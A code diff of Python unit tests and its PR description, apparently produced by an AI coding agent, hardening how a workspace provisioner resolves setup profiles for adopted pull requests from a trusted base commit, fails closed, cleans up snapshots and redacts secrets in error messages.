+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.ready.value
+        assert reloaded.resolved_profile is not None
+        assert reloaded.resolved_profile["name"] == "base-safe"
+        assert str(reloaded.resolved_profile.get("source", "")).startswith("repo:")
+        assert reloaded.remote_push_branch == "feature/stale"
+        assert reloaded.base_commit == base_sha
+        phases = reloaded.resolved_profile.get("phases") or {}
+        setup = phases.get("setup") or []
+        assert setup and "trusted-base-setup" in str(setup)
+        assert reloaded.auto_merge is True
+
+    assert _git_stdout(["rev-parse", "HEAD"], head_worktree) == head_sha
+    head_profile = (head_worktree / ".awf" / "workspace.yml").read_text(encoding="utf-8")
+    assert "head-unsafe" in head_profile
+    assert not snap_path.exists()
+    assert resolve_paths
+    assert all(path != head_worktree for path in resolve_paths)
+    assert any(snap_id in str(path) for path in resolve_paths)
+
+
+@pytest.mark.asyncio
+async def test_adopted_inline_profile_skips_trusted_base_snapshot(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    origin_repo, base_sha, _ = origin_stale_head
+    calls: list[str] = []
+
+    async def _boom(*_a: Any, **_k: Any) -> WorktreeLayout:
+        calls.append("detached")
+        raise AssertionError("inline profile must not materialize trusted base snapshot")
+
+    monkeypatch.setattr(git_manager, "add_detached_worktree_at_commit", _boom)
+
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            **_adopted_workspace_kwargs(
+                origin_repo,
+                base_sha=base_sha,
+                requested_profile={"name": "operator-inline", "docker": {"mode": "none"}},
+            )
+        )
+        ws.pr_number = 42
+        ws.base_commit = base_sha
+        await s.commit()
+        workspace_id = ws.id
+
+    await provisioner.provision(workspace_id)
+    assert calls == []
+    async with session_factory() as s:
+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.ready.value
+        assert reloaded.resolved_profile is not None
+        assert reloaded.resolved_profile["name"] == "operator-inline"
+
+
+@pytest.mark.asyncio
+async def test_adopted_explicit_registry_profile_skips_trusted_base_snapshot(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    origin_repo, base_sha, _ = origin_stale_head
+    calls: list[str] = []
+
+    async def _boom(*_a: Any, **_k: Any) -> WorktreeLayout:
+        calls.append("detached")
+        raise AssertionError("registry profile_ref must not use trusted base snapshot")
+
+    monkeypatch.setattr(git_manager, "add_detached_worktree_at_commit", _boom)
+
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            **_adopted_workspace_kwargs(origin_repo, base_sha=base_sha, profile_ref="generic")
+        )
+        ws.pr_number = 42
+        ws.base_commit = base_sha
+        await s.commit()
+        workspace_id = ws.id
+
+    await provisioner.provision(workspace_id)
+    assert calls == []
+    async with session_factory() as s:
+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.ready.value
+        assert reloaded.resolved_profile is not None
+        # Repo marker still beats registry under ordinary resolve; this test
+        # only proves the trusted-base snapshot path was not used.
+        assert reloaded.resolved_profile["name"] == "head-unsafe"
+        assert str(reloaded.resolved_profile.get("source", "")).startswith("repo:")
+
+
+@pytest.mark.asyncio
+async def test_ordinary_feature_branch_still_resolves_from_checkout(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+) -> None:
+    origin_repo, _base_sha, _ = origin_stale_head
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            repo_url=str(origin_repo),
+            branch_base="development",
+            task_title="feature",
+            task_prompt="p",
+            agent="codex",
+            test_commands=[],
+            task_kind="feature_branch_pr",
+            profile_ref="auto",
+        )
+        await s.commit()
+        workspace_id = ws.id
+
+    await provisioner.provision(workspace_id)
+    async with session_factory() as s:
+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.ready.value
+        assert reloaded.resolved_profile is not None
+        assert reloaded.resolved_profile["name"] == "base-safe"
+
+
+@pytest.mark.asyncio
+async def test_frozen_resolved_profile_skips_trusted_base_snapshot(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    origin_repo, base_sha, _ = origin_stale_head
+    calls: list[str] = []
+
+    async def _boom(*_a: Any, **_k: Any) -> WorktreeLayout:
+        calls.append("detached")
+        raise AssertionError("frozen resolved_profile must not re-resolve from base")
+
+    monkeypatch.setattr(git_manager, "add_detached_worktree_at_commit", _boom)
+
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            **_adopted_workspace_kwargs(
+                origin_repo,
+                base_sha=base_sha,
+                resolved_profile={
+                    "name": "already-frozen",
+                    "source": "repo:.awf/workspace.yml",
+                },
+            )
+        )
+        ws.pr_number = 42
+        ws.base_commit = base_sha
+        await s.commit()
+        workspace_id = ws.id
+
+    await provisioner.provision(workspace_id)
+    assert calls == []
+    async with session_factory() as s:
+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.ready.value
+        assert reloaded.resolved_profile is not None
+        assert reloaded.resolved_profile["name"] == "already-frozen"
+
+
+@pytest.mark.asyncio
+async def test_fork_head_identity_preserved_after_trusted_base_resolve(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+) -> None:
+    origin_repo, base_sha, head_sha = origin_stale_head
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            **_adopted_workspace_kwargs(
+                origin_repo,
+                base_sha=base_sha,
+                head_ref="fork-owner:feature/stale",
+                extra_adoption={
+                    "head_repo_full_name": "fork-owner/app",
+                    "head_repo_clone_url": "https://github.com/fork-owner/app.git",
+                },
+            )
+        )
+        ws.pr_number = 42
+        ws.base_commit = base_sha
+        await s.commit()
+        workspace_id = ws.id
+
+    await provisioner.provision(workspace_id)
+    async with session_factory() as s:
+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.ready.value
+        assert reloaded.remote_push_branch == "fork-owner:feature/stale"
+        stored = (reloaded.task_policy or {}).get("pr_adoption") or {}
+        assert stored.get("head_ref") == "fork-owner:feature/stale"
+        assert stored.get("head_repo_full_name") == "fork-owner/app"
+        assert stored.get("head_repo_clone_url") == ("https://github.com/fork-owner/app.git")
+        assert reloaded.resolved_profile is not None
+        assert reloaded.resolved_profile["name"] == "base-safe"
+    assert (
+        _git_stdout(["rev-parse", "HEAD"], git_manager.get_worktree_path(workspace_id)) == head_sha
+    )
+
+
+@pytest.mark.asyncio
+async def test_missing_trusted_base_sha_fails_closed_without_head_fallback(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    origin_repo, _base_sha, _ = origin_stale_head
+    resolve_paths: list[Path] = []
+    real_resolve = resolve_workspace_profile
+
+    def _spy_resolve(**kwargs: Any) -> Any:
+        path = kwargs.get("worktree_path")
+        if isinstance(path, Path):
+            resolve_paths.append(path)
+        return real_resolve(**kwargs)
+
+    monkeypatch.setattr("awf.node.provisioner.resolve_workspace_profile", _spy_resolve)
+
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            **_adopted_workspace_kwargs(origin_repo, base_sha=None)
+        )
+        ws.pr_number = 42
+        await s.commit()
+        workspace_id = ws.id
+
+    with pytest.raises(ProfileResolutionError):
+        await provisioner.provision(workspace_id)
+
+    async with session_factory() as s:
+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.failed.value
+        assert reloaded.failure_reason == "profile_resolution_failure"
+    head_worktree = git_manager.get_worktree_path(workspace_id)
+    assert all(path != head_worktree for path in resolve_paths)
+
+
+@pytest.mark.asyncio
+async def test_trusted_base_resolve_failure_reclaims_snapshot(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    origin_repo, base_sha, _ = origin_stale_head
+    snap_ids_seen: list[str] = []
+    real_add = git_manager.add_detached_worktree_at_commit
+
+    async def _tracking_add(*, workspace_id: str, repo_url: str, commit_sha: str) -> WorktreeLayout:
+        snap_ids_seen.append(workspace_id)
+        return await real_add(workspace_id=workspace_id, repo_url=repo_url, commit_sha=commit_sha)
+
+    monkeypatch.setattr(git_manager, "add_detached_worktree_at_commit", _tracking_add)
+
+    def _boom(**_kwargs: Any) -> Any:
+        raise ProfileResolutionError(
+            "synthetic base resolve failure",
+            reason_code="PROFILE_TRUSTED_BASE_RESOLVE_FAILED",
+        )
+
+    monkeypatch.setattr("awf.node.provisioner.resolve_workspace_profile", _boom)
+
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            **_adopted_workspace_kwargs(origin_repo, base_sha=base_sha)
+        )
+        ws.pr_number = 42
+        ws.base_commit = base_sha
+        await s.commit()
+        workspace_id = ws.id
+
+    with pytest.raises(ProfileResolutionError):
+        await provisioner.provision(workspace_id)
+
+    assert snap_ids_seen == [_trusted_base_profile_worktree_id(workspace_id)]
+    assert not git_manager.get_worktree_path(snap_ids_seen[0]).exists()
+    async with session_factory() as s:
+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.failed.value
+        assert reloaded.failure_reason == "profile_resolution_failure"
+
+
+@pytest.mark.asyncio
+async def test_trusted_base_materialize_failure_message_is_redacted(
+    session_factory: async_sessionmaker[AsyncSession],
+    git_manager: GitManager,
+    origin_stale_head: tuple[Path, str, str],
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    origin_repo, base_sha, _ = origin_stale_head
+    secret = "ghp_supersecretTokenValue999"
+
+    async def _boom(*, workspace_id: str, repo_url: str, commit_sha: str) -> WorktreeLayout:
+        del workspace_id, repo_url, commit_sha
+        raise GitOperationError(
+            operation="worktree.add_detached",
+            returncode=1,
+            stdout="",
+            stderr=f"fatal: could not read '{secret}' from remote",
+            reason_code="GIT_BASE_BRANCH_MISSING",
+        )
+
+    monkeypatch.setattr(git_manager, "add_detached_worktree_at_commit", _boom)
+
+    provisioner = Provisioner(
+        session_factory=session_factory,
+        git=git_manager,
+        config=ProvisionerConfig(node_id="test-node-01"),
+    )
+    async with session_factory() as s:
+        ws = await WorkspaceRepository(s).create(
+            **_adopted_workspace_kwargs(origin_repo, base_sha=base_sha)
+        )
+        ws.pr_number = 42
+        ws.base_commit = base_sha
+        await s.commit()
+        workspace_id = ws.id
+
+    with pytest.raises(GitOperationError):
+        await provisioner.provision(workspace_id)
+
+    async with session_factory() as s:
+        reloaded = await WorkspaceRepository(s).get(workspace_id)
+        assert reloaded is not None
+        assert reloaded.status == WorkspaceStatus.failed.value
+        message = reloaded.failure_message or ""
+        assert secret not in message
+        assert REDACTION_MARKER in message or "ghp_" not in message

--- a/tests/unit/node/test_provisioner_parts/test_provisioner_adoption_trusted_base_profile.py
+++ b/tests/unit/node/test_provisioner_parts/test_provisioner_adoption_trusted_base_profile.py
@@ -269,6 +269,27 @@ def test_base_resolved_repo_profile_is_trusted_only_with_verified_provenance() -
     )
     assert _provision_profile_auto_merge_is_trusted(ws, profile) is False
 
+    # Stamp present but adoption base_sha is non-string → fail closed.
+    ws.task_policy = {
+        "pr_adoption": {
+            "base_sha": 12345,
+            _PROFILE_TRUSTED_BASE_SHA_KEY: base_sha,
+        }
+    }
+    assert _provision_profile_auto_merge_is_trusted(ws, profile) is False
+
+    # Stamp present but adoption base_sha is not an exact full SHA → fail closed.
+    ws.task_policy = {
+        "pr_adoption": {
+            "base_sha": "  deadbeef  ",
+            _PROFILE_TRUSTED_BASE_SHA_KEY: base_sha,
+        }
+    }
+    assert _provision_profile_auto_merge_is_trusted(ws, profile) is False
+
+    with pytest.raises(ValueError, match="exact full commit SHA"):
+        _stamp_trusted_base_profile_provenance({}, trusted_base_sha="short")
+
     inline = WorkspaceProfile.model_validate(
         {"name": "inline", "source": "inline", "monitor": {"auto_merge": {"default": True}}}
     )
@@ -385,6 +406,84 @@ async def test_git_manager_detached_worktree_collision_fails_closed(
             workspace_id=snap_id, repo_url=str(repo), commit_sha=base_sha
         )
     assert raised.value.reason_code == "GIT_WORKTREE_ALREADY_EXISTS"
+
+
+@pytest.mark.asyncio
+async def test_git_manager_detached_worktree_recovers_via_targeted_fetch(
+    git_manager: GitManager, tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    """When the first rev-parse misses, a targeted origin fetch must recover the SHA."""
+    repo, base_sha, _ = _build_stale_head_safe_base_origin(tmp_path / "git")
+    snap_id = "ws_snap_fetch_ok__trusted_base_profile"
+    real_run = git_manager._run
+    rev_parse_attempts = 0
+    seen_ops: list[str] = []
+
+    async def _run(args: list[str], *, operation: str) -> Any:
+        nonlocal rev_parse_attempts
+        seen_ops.append(operation)
+        if operation == "mirror.rev-parse_commit":
+            rev_parse_attempts += 1
+            if rev_parse_attempts == 1:
+                raise GitOperationError(
+                    operation=operation,
+                    returncode=128,
+                    stdout="",
+                    stderr="missing object",
+                    reason_code="GIT_BASE_BRANCH_MISSING",
+                )
+        return await real_run(args, operation=operation)
+
+    monkeypatch.setattr(git_manager, "_run", _run)
+
+    layout = await git_manager.add_detached_worktree_at_commit(
+        workspace_id=snap_id, repo_url=str(repo), commit_sha=base_sha
+    )
+    assert layout.worktree_path.is_dir()
+    assert _git_stdout(["rev-parse", "HEAD"], layout.worktree_path) == base_sha
+    assert rev_parse_attempts == 2
+    assert "mirror.fetch_commit" in seen_ops
+    assert "worktree.add_detached" in seen_ops
+
+    await git_manager.remove_worktree(workspace_id=snap_id, repo_url=str(repo))
+
+
+@pytest.mark.asyncio
+async def test_git_manager_detached_worktree_fetch_miss_fails_closed(
+    git_manager: GitManager, tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
+    """If targeted fetch cannot make the SHA peelable, fail with GIT_BASE_BRANCH_MISSING."""
+    repo, base_sha, _ = _build_stale_head_safe_base_origin(tmp_path / "git")
+    snap_id = "ws_snap_fetch_miss__trusted_base_profile"
+    real_run = git_manager._run
+
+    async def _run(args: list[str], *, operation: str) -> Any:
+        if operation == "mirror.rev-parse_commit":
+            raise GitOperationError(
+                operation=operation,
+                returncode=128,
+                stdout="",
+                stderr="still missing after fetch",
+                reason_code="GIT_BASE_BRANCH_MISSING",
+            )
+        if operation == "mirror.fetch_commit":
+            # Fetch "succeeds" but does not make the object available — second
+            # rev-parse (also patched) still fails closed.
+            return await real_run(
+                ["git", "--version"],
+                operation="mirror.fetch_commit_noop",
+            )
+        return await real_run(args, operation=operation)
+
+    monkeypatch.setattr(git_manager, "_run", _run)
+
+    with pytest.raises(GitOperationError) as raised:
+        await git_manager.add_detached_worktree_at_commit(
+            workspace_id=snap_id, repo_url=str(repo), commit_sha=base_sha
+        )
+    assert raised.value.reason_code == "GIT_BASE_BRANCH_MISSING"
+    assert raised.value.operation == "worktree.add_detached"
+    assert not git_manager.get_worktree_path(snap_id).exists()
 
 
 @pytest.mark.asyncio

--- a/tests/unit/node/test_provisioner_parts/test_provisioner_adoption_trusted_base_profile.py
+++ b/tests/unit/node/test_provisioner_parts/test_provisioner_adoption_trusted_base_profile.py
@@ -278,6 +278,54 @@ def test_base_resolved_repo_profile_is_trusted_only_with_verified_provenance() -
     assert _provision_profile_auto_merge_is_trusted(ws, profile) is True
 
 
+def test_provenance_survives_retained_merge_base_overwrite_of_base_commit() -> None:
+    """Stamp from tip without adoption base_sha must not break after base_commit retention.
+
+    Provision may overwrite ``workspace.base_commit`` with a retained merge-base for
+    unrebased heads. Verification must use immutable adoption provenance, not that
+    overwritten tip, or a successful trusted-base resolve incorrectly fails the
+    auto-merge trust gate.
+    """
+    tip_sha = "a" * 40
+    merge_base_sha = "b" * 40
+    ws = Workspace(
+        id="ws_retain",
+        repo_url="https://github.com/example/app.git",
+        branch_base="development",
+        task_title="t",
+        task_prompt="p",
+        agent="codex",
+        test_commands=[],
+        task_kind="sync_feature_pr",
+        # Adoption tip was only on workspace.base_commit (no pr_adoption.base_sha).
+        base_commit=tip_sha,
+        task_policy={"pr_adoption": {"head_ref": "feature/x"}},
+    )
+    profile = WorkspaceProfile.model_validate(
+        {
+            "name": "base-safe",
+            "source": "repo:.awf/workspace.yml",
+            "monitor": {"auto_merge": {"default": True}},
+        }
+    )
+    assert _trusted_base_sha_for_adopted_auto_profile(ws) == tip_sha
+
+    ws.task_policy = _stamp_trusted_base_profile_provenance(
+        ws.task_policy if isinstance(ws.task_policy, dict) else None,
+        trusted_base_sha=tip_sha,
+    )
+    adoption = (ws.task_policy or {}).get("pr_adoption") or {}
+    assert adoption.get(_PROFILE_TRUSTED_BASE_SHA_KEY) == tip_sha
+    assert adoption.get("base_sha") == tip_sha
+
+    # Simulate post-provision retained merge-base overwrite.
+    ws.base_commit = merge_base_sha
+    assert _provision_profile_auto_merge_is_trusted(ws, profile) is True
+    # Materialization helper may still see base_commit as a candidate, but
+    # immutable adoption base_sha must win after the stamp persisted it.
+    assert _trusted_base_sha_for_adopted_auto_profile(ws) == tip_sha
+
+
 @pytest.mark.asyncio
 async def test_git_manager_detached_worktree_rejects_short_sha(
     git_manager: GitManager, tmp_path: Path

--- a/tests/unit/node/test_provisioner_parts/test_provisioner_auto_merge.py
+++ b/tests/unit/node/test_provisioner_parts/test_provisioner_auto_merge.py
@@ -144,16 +144,16 @@ async def test_provision_resolves_auto_merge(
 @pytest.mark.parametrize(
     ("task_kind", "profile", "intent", "expected"),
     [
-        # Adopted feature PR whose profile comes from the PR-head checkout
-        # (source ``repo:...``): its monitor.auto_merge config is attacker-
-        # controlled and must NOT self-authorize auto-merge when intent is unset.
+        # Adopted feature PR auto profiles now freeze from the trusted target
+        # base, so a ``repo:`` monitor.auto_merge default is operator/base-
+        # controlled and may authorize when intent is unset (same as feature PRs).
         (
             "sync_feature_pr",
             _profile(
                 default=True, by_base_branch={"development": True}, source="repo:.awf/workspace.yml"
             ),
             None,
-            False,
+            True,
         ),
         # ...but an explicit operator intent still enables it for the same PR.
         (
@@ -180,7 +180,7 @@ async def test_provision_resolves_auto_merge(
         ),
     ],
 )
-async def test_provision_untrusted_pr_head_profile_cannot_self_authorize_auto_merge(
+async def test_provision_repo_profile_auto_merge_trust_for_adopted_and_feature_workspaces(
     session_factory: async_sessionmaker[AsyncSession],
     git_manager: GitManager,
     origin_repo: Path,

--- a/tests/unit/node/test_provisioner_parts/test_provisioner_auto_merge.py
+++ b/tests/unit/node/test_provisioner_parts/test_provisioner_auto_merge.py
@@ -142,18 +142,19 @@ async def test_provision_resolves_auto_merge(
 
 
 @pytest.mark.parametrize(
-    ("task_kind", "profile", "intent", "expected"),
+    ("task_kind", "profile", "intent", "expected", "extra_policy"),
     [
-        # Adopted feature PR auto profiles now freeze from the trusted target
-        # base, so a ``repo:`` monitor.auto_merge default is operator/base-
-        # controlled and may authorize when intent is unset (same as feature PRs).
+        # Adopted feature PR with a frozen/legacy ``repo:`` profile and no
+        # verified trusted-base provenance must not self-authorize auto-merge
+        # when intent is unset (explicit operator intent still required).
         (
             "sync_feature_pr",
             _profile(
                 default=True, by_base_branch={"development": True}, source="repo:.awf/workspace.yml"
             ),
             None,
-            True,
+            False,
+            None,
         ),
         # ...but an explicit operator intent still enables it for the same PR.
         (
@@ -161,6 +162,7 @@ async def test_provision_resolves_auto_merge(
             _profile(default=False, by_base_branch={}, source="repo:.awf/workspace.yml"),
             True,
             True,
+            None,
         ),
         # An operator-supplied inline profile (source ``inline``) is trusted, so its
         # config is honoured even for an adopted PR with unset intent.
@@ -169,6 +171,21 @@ async def test_provision_resolves_auto_merge(
             _profile(default=True, by_base_branch={}, source="inline"),
             None,
             True,
+            None,
+        ),
+        # Verified trusted-base provenance lets a base-resolved ``repo:`` profile
+        # authorize auto-merge when intent is unset.
+        (
+            "sync_feature_pr",
+            _profile(default=True, by_base_branch={}, source="repo:.awf/workspace.yml"),
+            None,
+            True,
+            {
+                "pr_adoption": {
+                    "base_sha": "a" * 40,
+                    "profile_trusted_base_sha": "a" * 40,
+                }
+            },
         ),
         # A normal create workspace resolves its profile from the trusted base
         # branch, so a repo-sourced auto-merge default is honoured.
@@ -177,6 +194,7 @@ async def test_provision_resolves_auto_merge(
             _profile(default=True, by_base_branch={}, source="repo:.awf/workspace.yml"),
             None,
             True,
+            None,
         ),
     ],
 )
@@ -188,6 +206,7 @@ async def test_provision_repo_profile_auto_merge_trust_for_adopted_and_feature_w
     profile: dict[str, Any],
     intent: bool | None,
     expected: bool,
+    extra_policy: dict[str, Any] | None,
 ) -> None:
     provisioner = Provisioner(
         session_factory=session_factory,
@@ -195,6 +214,9 @@ async def test_provision_repo_profile_auto_merge_trust_for_adopted_and_feature_w
         stack_launcher=_RecordingStackLauncher(),
         config=ProvisionerConfig(node_id="test-node-01"),
     )
+    policy: dict[str, Any] = {AUTO_MERGE_INTENT_POLICY_KEY: intent}
+    if extra_policy:
+        policy.update(extra_policy)
     async with session_factory() as s:
         ws = await WorkspaceRepository(s).create(
             repo_url=str(origin_repo),
@@ -204,7 +226,7 @@ async def test_provision_repo_profile_auto_merge_trust_for_adopted_and_feature_w
             agent="codex",
             test_commands=[],
             resolved_profile=profile,
-            task_policy={AUTO_MERGE_INTENT_POLICY_KEY: intent},
+            task_policy=policy,
             auto_merge=bool(intent) if intent is not None else False,
             task_kind=task_kind,
         )

--- a/tests/unit/node/test_provisioner_parts/test_provisioner_part_001.py
+++ b/tests/unit/node/test_provisioner_parts/test_provisioner_part_001.py
@@ -347,6 +347,11 @@ class TestSuccess:
             stack_launcher=launcher,
             config=ProvisionerConfig(node_id="test-node-01"),
         )
+        base_sha = subprocess.check_output(
+            ["git", "rev-parse", "HEAD"],
+            cwd=origin_repo,
+            text=True,
+        ).strip()
         _git(["update-ref", "refs/pull/277/head", "HEAD"], origin_repo)
         async with session_factory() as s:
             ws = await WorkspaceRepository(s).create(
@@ -362,11 +367,13 @@ class TestSuccess:
                         "repo_slug": "dimileeh/aira-web",
                         "pr_number": 277,
                         "head_ref": "feature/ready",
+                        "base_sha": base_sha,
                         "execution": {"mode": "hosted"},
                     }
                 },
                 remote_push_branch="feature/ready",
             )
+            ws.base_commit = base_sha
             await s.commit()
             ws_id = ws.id
 
@@ -585,6 +592,13 @@ class TestSuccess:
         (origin_repo / "docker-compose.yml").write_text("services: {}\n", encoding="utf-8")
         _git(["add", "docker-compose.yml"], origin_repo)
         _git(["commit", "-q", "-m", "add compose profile"], origin_repo)
+        # Trusted-base auto profile resolve uses the immutable adoption base SHA,
+        # so the compose file that drives dind detection must exist on that tip.
+        base_sha = subprocess.check_output(
+            ["git", "rev-parse", "HEAD"],
+            cwd=origin_repo,
+            text=True,
+        ).strip()
         _git(["update-ref", "refs/pull/764/head", "HEAD"], origin_repo)
 
         launcher = _RenderOnlyStackLauncher()
@@ -609,11 +623,13 @@ class TestSuccess:
                         "repo_slug": "dimileeh/agent-workspace-fabric",
                         "pr_number": 764,
                         "head_ref": "feature/ready",
+                        "base_sha": base_sha,
                         "execution": {"mode": "hosted"},
                     }
                 },
                 remote_push_branch="feature/ready",
             )
+            ws.base_commit = base_sha
             task = await TaskRepository(s).create_or_get(
                 repo_url=ws.repo_url,
                 base_branch=ws.branch_base,

--- a/tests/unit/node/test_provisioner_parts/test_provisioner_part_006.py
+++ b/tests/unit/node/test_provisioner_parts/test_provisioner_part_006.py
@@ -644,6 +644,7 @@ class TestFailureHandlingEdgesPart006:
         the coding runtime during provisioning and must bypass the runtime gate.
         """
         git_called = False
+        trusted_base_sha = "a" * 40
 
         class _MockGitManager:
             async def add_worktree(self, *args: Any, **kwargs: Any) -> Any:
@@ -660,6 +661,19 @@ class TestFailureHandlingEdgesPart006:
             async def head_sha(self, *args: Any, **kwargs: Any) -> str:
                 return "sha"
 
+            async def add_detached_worktree_at_commit(self, *args: Any, **kwargs: Any) -> Any:
+                from awf.node.git_manager import WorktreeLayout
+
+                assert kwargs.get("commit_sha") == trusted_base_sha
+                return WorktreeLayout(
+                    mirror_path=origin_repo,
+                    worktree_path=origin_repo,
+                    branch_name="",
+                )
+
+            async def remove_worktree(self, *args: Any, **kwargs: Any) -> None:
+                return None
+
         provisioner = Provisioner(
             session_factory=session_factory,
             git=_MockGitManager(),  # type: ignore[arg-type]
@@ -670,6 +684,7 @@ class TestFailureHandlingEdgesPart006:
             task_policy["pr_adoption"] = {
                 "head_ref": "feature-branch",
                 "pr_number": 42,
+                "base_sha": trusted_base_sha,
             }
         async with session_factory() as s:
             ws = await WorkspaceRepository(s).create(


### PR DESCRIPTION
Automatically opened by AWF workspace `ws_5c05c89b5602430b8b833a69` (agent: `cursor`, model: `auto`).

**External task ID**: awf-core-stale-adopt-profile-bootstrap-v1

### Task
Environment notes:
- This is public AWF Core. The repository is mounted at /workspace, git is functional, and the existing .awf/workspace.yml owns project setup and validation.
- This is a generic Core lifecycle defect found through a hosted AWF Cloud adoption of an old aira-web PR; do not add Aira-specific behavior.
- AWF owns pushing, PR creation, review handling, and merge after your implementation. Do not push or open/merge a PR yourself.

Problem:
An adopted sync_feature_pr correctly checks out the existing PR head so monitor repairs can push fast-forward to that branch. But profile_ref=auto is then resolved and frozen from that same PR-head checkout before the monitor's base-sync gate runs. If the PR predates a required .awf/workspace.yml repair on its target branch, hosted setup rejects the stale head profile and the monitor can never start to merge the repaired base. The PR author also controls executable profile content at this point, which is the wrong trust boundary.

What to do:
1. Use strict TDD. Reproduce an adopted PR whose head has an old/unsafe repo profile while the immutable target base SHA has a newer cloud-safe profile.
2. For sync_feature_pr adoption with profile_ref=auto and no operator-supplied inline profile, resolve and freeze the workspace profile from the immutable adopted target-base snapshot, while continuing to check out, repair, validate, and push the existing PR head.
3. Preserve profile precedence and behavior for explicit inline profiles, explicit non-auto registry profiles, ordinary feature workspaces, retries/recovery, release sync, fork PRs, and existing fast-forward push semantics.
4. Treat profile bootstrap as a trust boundary: an adopted PR must not enable its own setup commands or monitor auto-merge through its head profile. Fail closed with structured, redacted evidence when the trusted base snapshot cannot be materialized or resolved; do not silently fall back to PR-head profile content.
5. Ensure any temporary base snapshot/worktree is concurrency-safe and always reclaimed on success and failure. Do not mutate or push the PR branch merely to obtain the base profile.
6. Add focused positive and negative tests covering the stale-head/current-base regression, explicit-profile precedence, no head-profile execution, fork/head identity preservation, cleanup/error handling, redaction, and unchanged PR-head checkout/push behavior.
7. Update only the adoption/trust documentation needed to state which revision owns automatic profile resolution.

What to optimize for:
- The smallest generic Core fix at the profile-resolution/provisioning boundary.
- Deterministic immutable-base provenance and fail-closed security.
- No hosted-cloud product logic in Core and no API expansion unless it is genuinely required by the generic lifecycle contract.
- Focused tests first, then the repository profile's normal validation.

Commit all intended changes before exiting. Do not push; AWF handles it.

---
Validation: 4 profile command(s) passed inside the workspace container.

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **High Risk**
> Changes the security trust boundary for adopted PR provisioning, executable setup profile content, and when repo profiles may authorize auto-merge; incorrect behavior could enable PR-controlled setup or merges.
> 
> **Overview**
> Adopted **`sync_feature_pr`** workspaces with **`profile_ref=auto`** and no operator inline profile now **freeze `resolved_profile` from the immutable adoption target-base SHA**, not from the PR-head tree. Provisioning still checks out the PR head for monitor push/repair; it briefly materializes a **detached worktree** at the base commit for profile resolve, then **always reclaims** it (failures included). Missing or invalid base SHA / snapshot materialization **fails closed** with no silent PR-head fallback.
> 
> **Auto-merge trust** is tightened: repo-sourced **`monitor.auto_merge`** on adopted workspaces is honored only when **`profile_trusted_base_sha`** provenance is stamped and matches adoption **`base_sha`**; legacy frozen PR-head profiles still require explicit operator intent. Inline and non-`auto` registry profiles are unchanged.
> 
> Git support is split into **`add_detached_worktree_at_commit`** (with targeted fetch on missing objects) and a moved **`verify_head_object_exists`** module. Provisioner git error paths **redact secrets** in logs and failure messages. Adoption/trust docs describe the new automatic profile resolution boundary.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit faca74170f96438f6b22d86d99cb11a86ac1192f. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->